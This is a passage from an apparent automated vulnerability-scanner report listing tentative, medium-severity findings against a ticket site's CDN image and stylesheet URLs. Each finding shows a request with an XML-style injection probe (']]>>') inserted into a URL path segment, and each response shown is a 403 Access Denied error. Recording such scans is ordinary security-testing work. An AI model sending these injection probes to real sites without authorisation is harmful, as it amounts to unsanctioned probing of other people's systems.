Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F9EC97154F9BC8E
x-amz-id-2: 4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5PZGbjFEw9N9ay+r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1c2ccb5ea4283fc00e76ebc438bb7b37d045c25c493ed985082a16cec092b21b6884b2ec592fb94d
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F9EC97154F9BC8E</RequestId><HostId>4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5P
...[SNIP]...

8.87. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD7EBEB28E2DF68E
x-amz-id-2: KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV8H6pc3LZh3vE9w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 028b40a4dcd5adb8f48534e8f2deb55c798e3d1a35c9dfa49d027696b4bddfce2033fb5e1b15fadf
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD7EBEB28E2DF68E</RequestId><HostId>KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV
...[SNIP]...

8.88. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 41D9184ED71E08A9
x-amz-id-2: HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzOZwT+qvrEi9mDAj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8eec58003985f09f838e15b608e2711c8e8eaebb2ff60ad96113e274ab0d1bc7cef2fc7661b4cf79
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>41D9184ED71E08A9</RequestId><HostId>HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzO
...[SNIP]...

8.89. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E29750E108656AE1
x-amz-id-2: DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQvCVG+uf+mljqaa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f918d877098e0239bdcda8f63a940bbeb63aa5e47e4ef31f00376e1109e02ca2f86039f09300cb58
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E29750E108656AE1</RequestId><HostId>DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQ
...[SNIP]...

8.90. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/cancel.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CD105DAD25FB802
x-amz-id-2: vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySVzLSdweB8x+21dl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69bfd2d02b0af504f95bc0b27bfca12969070f3ec4f3686b25a03d907a2febb50d5e173dc3227f0f
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CD105DAD25FB802</RequestId><HostId>vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySV
...[SNIP]...

8.91. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/fstron/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F78490DB9BCE2D8
x-amz-id-2: Yh146A2FU4MKF5M8GcTAWd4AvgC3xgtbi7ymu29U1KXIZ55s1DWCsIdUJ+T2hGuD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7135abb9931300ffd2576466b0d0f2205ea07d7edc4f5ef7316c52bdf810a7d0637c7b207d40cb88
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F78490DB9BCE2D8</RequestId><HostId>Yh146A2FU4MKF5M8GcTAWd4AvgC3xgtbi7ymu29U1KXIZ55s1D
...[SNIP]...

8.92. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/fstron/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6B8C0EA1E6FB26AD
x-amz-id-2: FTFJVs++RcyY2Wzof1UgDVTUPrXqTdjTpOdK0F00LO/8AOEuJfZhTzP9OuvW52Ki
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 728376edffb0a57f22a1e936bdd86fb61f17aa54b30b8401307a7bc59b7313cd661e0fde5fbee89a
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6B8C0EA1E6FB26AD</RequestId><HostId>FTFJVs++RcyY2Wzof1UgDVTUPrXqTdjTpOdK0F00LO/8AOEuJf
...[SNIP]...

8.93. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/fstron]]>>/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 390F74F86C68625C
x-amz-id-2: 1S5DCQ+qZWhWf5rVYqawlnwRRL6782hgVaS3YWALYppVIvFV2uaQVktP6iCnbafP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 88549d51be3a35f997bf45c7af6112c3dea5b8431daa32f85aceb01b13672bcad92bf0fbf23c35bb
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>390F74F86C68625C</RequestId><HostId>1S5DCQ+qZWhWf5rVYqawlnwRRL6782hgVaS3YWALYppVIvFV2u
...[SNIP]...

8.94. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 66AB3CBF8B44F0B6
x-amz-id-2: Y+DXDjulDW4KVSHcYzwY5lqwnHu+gMY8TdwWpSvBKrdNbedasYOcysGbG5nAPsbB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 79a94b86914fa1043fa9e531fb36b91de8c1816433f5458d4ea18976039a3c712c734cd2e0860b6e
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>66AB3CBF8B44F0B6</RequestId><HostId>Y+DXDjulDW4KVSHcYzwY5lqwnHu+gMY8TdwWpSvBKrdNbedasY
...[SNIP]...

8.95. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BCE770010370D439
x-amz-id-2: yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7azBDmIsJ8QWJ2nt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
Age: 92
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9397855e4b02e3a8d755a382bf53c6ec243cfd7e456e88b3d1b6408c5196d2df2dd0cb133105b22b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BCE770010370D439</RequestId><HostId>yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7a
...[SNIP]...

8.96. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9424DDABF6B3EB85
x-amz-id-2: NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5hOTirUw3f4HUhyJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
Age: 99
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fe28f00686e92fc13e2c8d60fffdf99e5a5137b24f2825598fe1b62df6fda0b036e1afb076931f67
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9424DDABF6B3EB85</RequestId><HostId>NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5h
...[SNIP]...

8.97. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD5969C5272C5072
x-amz-id-2: /XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJkLgI0fOTq1qy0RC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
Age: 101
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f7d75effa07e7013335d239cdafed378dd26cc9715aad5442146b6373d271cfbb0d40f45f6712268
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD5969C5272C5072</RequestId><HostId>/XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJk
...[SNIP]...

8.98. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E1EBADA150E2C6C
x-amz-id-2: Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLqD7Nr2gSOWS+Yiy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:18 GMT
Server: AmazonS3
Content-Length: 231
Age: 47
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4ff5b13ad442e811e4bbbabe988fee860f17bed21f13b7b4598279137b6dc095c008d0fc84a6fa4f
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E1EBADA150E2C6C</RequestId><HostId>Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLq
...[SNIP]...

8.99. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6C13D5704545D95B
x-amz-id-2: oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4pXCRebcYc4l25y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:22 GMT
Server: AmazonS3
Content-Length: 231
Age: 44
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fb99379fca63b9151bd9a41dda98fb168d81862e7508a959d4d76210dff835a7a5ea75f16865c635
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6C13D5704545D95B</RequestId><HostId>oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4
...[SNIP]...

8.100. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F1122D085F1BF757
x-amz-id-2: 8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYdSJjMGMaL/hnxC8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:25 GMT
Server: AmazonS3
Content-Length: 231
Age: 42
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a4b36f1d4ba1b1b73b23883119b2fd2e91e620b8d2780fe1fe492153a62566aff40722cd988941c
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F1122D085F1BF757</RequestId><HostId>8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYd
...[SNIP]...

8.101. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 301F2BF9BC988511
x-amz-id-2: okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0vLfhfAdtsQXxhDQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: AmazonS3
Content-Length: 231
Age: 41
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 272ec9ab295e1482d91208f8a1f254c0ad896c9aecee6e5f7810b84175668ebb708817e9df66926c
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
